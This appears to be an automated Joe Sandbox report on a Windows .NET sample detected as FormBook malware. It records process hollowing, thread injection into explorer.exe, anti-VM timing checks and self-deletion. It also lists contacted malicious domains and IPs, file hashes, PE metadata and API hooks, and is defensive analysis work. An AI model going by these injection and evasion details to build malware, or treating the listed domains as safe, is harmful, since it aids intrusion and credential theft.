          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationApplication Layer Protocol11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510423 Sample: VJaX7U6LAp.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 33 www.marciaroyal.com 2->33 35 cname.landingi.com 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 51 6 other signatures 2->51 11 VJaX7U6LAp.exe 3 2->11         started        signatures3 49 System process connects to network (likely due to code injection or exploit) 33->49 process4 file5 31 C:\Users\user\AppData\...\VJaX7U6LAp.exe.log, ASCII 11->31 dropped 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 VJaX7U6LAp.exe 11->15         started        18 VJaX7U6LAp.exe 11->18         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 20 explorer.exe 15->20 injected process9 dnsIp10 37 www.vrchance.com 20->37 39 www.usauber.com 20->39 41 www.sunnytheodora.com 20->41 53 System process connects to network (likely due to code injection or exploit) 20->53 24 help.exe 20->24         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 24->55 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          VJaX7U6LAp.exe10%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.VJaX7U6LAp.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.VJaX7U6LAp.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.VJaX7U6LAp.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.VJaX7U6LAp.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          www.zahnimplantatangebotede.com/mxwf/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cname.landingi.com
          		54.77.19.84
          		truefalse
            		high
            www.usauber.com
            		unknown
            		unknowntrue
              		unknown
              www.marciaroyal.com
              		unknown
              		unknowntrue
                		unknown
                www.vrchance.com
                		unknown
                		unknowntrue
                  		unknown
                  www.sunnytheodora.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    www.zahnimplantatangebotede.com/mxwf/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000000.399795242.000000000095C000.00000004.00000020.sdmpfalse
                      		high
                      http://www.collada.org/2005/11/COLLADASchema9DoneVJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      Contacted IPs

                      No contacted IP infos

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:510423
                      Start date:27.10.2021
                      Start time:19:32:36
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:VJaX7U6LAp.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@9/1@4/0
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 33.9% (good quality ratio 31.7%)
                      • Quality average: 72.1%
                      • Quality standard deviation: 30.7%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 76
                      • Number of non-executed functions: 134
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.189.173.20, 23.211.6.115, 20.189.173.22, 104.208.16.94, 13.89.179.12, 20.82.210.154, 209.197.3.8, 20.54.110.249, 52.251.79.25, 40.112.88.60, 80.67.82.242, 80.67.82.235, 23.211.4.86, 20.50.102.62
                      • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      19:33:37API Interceptor1x Sleep call for process: VJaX7U6LAp.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      cname.landingi.comSDL_Order Onay#U0131 _ Acil,pdf.exeGet hashmaliciousBrowse
                      • 54.77.19.84
                      DF_Nueva orden _WJO-001,pdf.exeGet hashmaliciousBrowse
                      • 108.128.238.226
                      Yeni Sipari#U015f #86-55113,pdf.exeGet hashmaliciousBrowse
                      • 52.212.68.12
                      ny5QHKcgLH.exeGet hashmaliciousBrowse
                      • 108.128.238.226
                      IMG16092021.exeGet hashmaliciousBrowse
                      • 52.212.68.12
                      ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                      • 52.212.68.12
                      0OBKA8AwTn.exeGet hashmaliciousBrowse
                      • 54.77.19.84
                      ZbpMqzUXVN.exeGet hashmaliciousBrowse
                      • 108.128.238.226
                      PO_IMG_13072021_item.exeGet hashmaliciousBrowse
                      • 52.212.68.12
                      47mAsp9IER.exeGet hashmaliciousBrowse
                      • 54.77.19.84
                      U03c2doc.exeGet hashmaliciousBrowse
                      • 108.128.238.226
                      scan-copy059950059pdf.exeGet hashmaliciousBrowse
                      • 108.128.238.226
                      SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                      • 108.128.238.226
                      Descripciones de oferta de productos MACIILIAS SRL doc.exeGet hashmaliciousBrowse
                      • 54.77.19.84
                      a449cc12_by_Libranalysis.exeGet hashmaliciousBrowse
                      • 52.212.68.12
                      Dokument Nota odbiorcza IMI FFPT-2019223912003_2021 doc.exeGet hashmaliciousBrowse
                      • 108.128.238.226
                      Documento de transfer#U00eancia banc#U00e1ria _2021doc.exeGet hashmaliciousBrowse
                      • 52.212.68.12
                      TSVINCCU21021642.exeGet hashmaliciousBrowse
                      • 52.212.68.12
                      SWIFT COPY.exeGet hashmaliciousBrowse
                      • 54.77.19.84
                      SWIFT COPY.exeGet hashmaliciousBrowse
                      • 54.77.19.84

                      ASN

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VJaX7U6LAp.exe.log
                      Process:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.355304211458859
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):6.687486048595242
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:VJaX7U6LAp.exe
                      File size:520192
                      MD5:15a4b8c6607b8e67b0bba2d1b5dbd43e
                      SHA1:c77c0417b07c25c0e567f0d0362a8a80fc7c40e9
                      SHA256:c4b1789371d832969f812bd0a577e380cdac00db6775d7fc251adf8d92c15d74
                      SHA512:b168504f30e0714a8d2ec0eb79a9d49b5c1f84399ac0ee091fe9b4983e9ed77b9fd70398a6c2644b3295f777d3d9b84422f76897e722df579a1ef1dd66d8704c
                      SSDEEP:12288:IaNilVYYYGC3tsZ1isByVk2t0iWbtY36yhPhQ:bNilBYui7m2t0iWY6yh
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.ya..............0.............J.... ... ....@.. .......................`............@................................

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x48054a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x6179805F [Wed Oct 27 16:37:51 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:v4.0.30319
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x804f80x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x5c4.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x7e5500x7e600False0.685342096316data6.69788098244IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rsrc0x820000x5c40x600False0.430989583333data4.15472453477IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x840000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_VERSION0x820900x334data
                      RT_MANIFEST0x823d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Version Infos

                      DescriptionData
                      Translation0x0000 0x04b0
                      LegalCopyrightDelchamps 2015
                      Assembly Version7.3.0.0
                      InternalNameSharedI.exe
                      FileVersion7.3.0.0
                      CompanyNameDelchamps
                      LegalTrademarks
                      Comments
                      ProductNamePlatformer_AI
                      ProductVersion7.3.0.0
                      FileDescriptionPlatformer_AI
                      OriginalFilenameSharedI.exe

                      Network Behavior

                      Network Port Distribution

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 27, 2021 19:34:47.814812899 CEST6077853192.168.2.68.8.8.8
                      Oct 27, 2021 19:34:47.836822033 CEST53607788.8.8.8192.168.2.6
                      Oct 27, 2021 19:35:04.025022030 CEST5932953192.168.2.68.8.8.8
                      Oct 27, 2021 19:35:04.055140972 CEST53593298.8.8.8192.168.2.6
                      Oct 27, 2021 19:35:24.880810976 CEST6402153192.168.2.68.8.8.8
                      Oct 27, 2021 19:35:24.922605038 CEST53640218.8.8.8192.168.2.6
                      Oct 27, 2021 19:35:47.099709988 CEST5070053192.168.2.68.8.8.8
                      Oct 27, 2021 19:35:47.126094103 CEST53507008.8.8.8192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Oct 27, 2021 19:34:47.814812899 CEST192.168.2.68.8.8.80xef69Standard query (0)www.usauber.comA (IP address)IN (0x0001)
                      Oct 27, 2021 19:35:04.025022030 CEST192.168.2.68.8.8.80xdeddStandard query (0)www.sunnytheodora.comA (IP address)IN (0x0001)
                      Oct 27, 2021 19:35:24.880810976 CEST192.168.2.68.8.8.80xc2a6Standard query (0)www.vrchance.comA (IP address)IN (0x0001)
                      Oct 27, 2021 19:35:47.099709988 CEST192.168.2.68.8.8.80x4c2Standard query (0)www.marciaroyal.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Oct 27, 2021 19:34:47.836822033 CEST8.8.8.8192.168.2.60xef69Name error (3)www.usauber.comnonenoneA (IP address)IN (0x0001)
                      Oct 27, 2021 19:35:04.055140972 CEST8.8.8.8192.168.2.60xdeddName error (3)www.sunnytheodora.comnonenoneA (IP address)IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST8.8.8.8192.168.2.60x4c2No error (0)www.marciaroyal.comcname.landingi.comCNAME (Canonical name)IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST8.8.8.8192.168.2.60x4c2No error (0)cname.landingi.com54.77.19.84A (IP address)IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST8.8.8.8192.168.2.60x4c2No error (0)cname.landingi.com52.212.68.12A (IP address)IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST8.8.8.8192.168.2.60x4c2No error (0)cname.landingi.com108.128.238.226A (IP address)IN (0x0001)

                      Code Manipulations

                      User Modules

                      Hook Summary

                      Function NameHook TypeActive in Processes
                      PeekMessageAINLINEexplorer.exe
                      PeekMessageWINLINEexplorer.exe
                      GetMessageWINLINEexplorer.exe
                      GetMessageAINLINEexplorer.exe

                      Processes

                      Process: explorer.exe, Module: user32.dll
                      Function NameHook TypeNew Data
                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                      PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0
                      GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0
                      GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: VJaX7U6LAp.exe PID: 6316 Parent PID: 5372

                      General

                      Start time:19:33:36
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\VJaX7U6LAp.exe'
                      Imagebase:0x140000
                      File size:520192 bytes
                      MD5 hash:15A4B8C6607B8E67B0BBA2D1B5DBD43E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      Chronological Activities

                      Analysis Process: VJaX7U6LAp.exe PID: 5088 Parent PID: 6316

                      General

                      Start time:19:33:38
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Imagebase:0x220000
                      File size:520192 bytes
                      MD5 hash:15A4B8C6607B8E67B0BBA2D1B5DBD43E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Chronological Activities

                      Analysis Process: VJaX7U6LAp.exe PID: 6284 Parent PID: 6316

                      General

                      Start time:19:33:39
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Imagebase:0xb40000
                      File size:520192 bytes
                      MD5 hash:15A4B8C6607B8E67B0BBA2D1B5DBD43E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      Chronological Activities

                      Analysis Process: explorer.exe PID: 3440 Parent PID: 6284

                      General

                      Start time:19:33:42
                      Start date:27/10/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
